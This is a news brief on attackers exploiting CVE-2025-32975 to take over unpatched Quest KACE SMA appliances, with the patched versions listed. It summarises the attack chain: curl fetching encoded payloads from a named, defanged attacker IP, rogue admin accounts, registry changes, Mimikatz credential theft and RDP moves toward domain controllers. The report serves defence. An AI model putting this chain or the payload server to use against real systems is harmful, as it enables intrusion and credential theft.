THREAT actors are suspected of exploiting the maximum-severity vulnerability CVE-2025-32975 (CVSS 10.0) to hijack unpatched Quest KACE Systems Management Appliance (SMA) systems, according to Arctic Wolf. The cybersecurity firm said it observed malicious activity starting in the week of 9 March 2026 in customer environments, targeting SMA instances exposed to the internet.
CVE-2025-32975 is an authentication bypass vulnerability that could let attackers impersonate legitimate users without credentials, and Quest released a patch in May 2025; however, the latest activity suggests unpatched SMA deployments remained at risk.
In the observed campaign, threat actors are believed to have seized administrative control and used remote commands to drop Base64-encoded payloads from an external server (216.126.225[.]156) via curl, while also creating additional administrative accounts using runkbot[.]exe and making Windows Registry changes via a PowerShell script.
Other detected actions include credential harvesting with Mimikatz, discovery and enumeration of users and admin accounts, and efforts to gain RDP access to backup infrastructure and domain controllers. Administrators are advised to apply the latest updates and avoid exposing SMA instances to the internet; the vulnerability has been addressed in versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).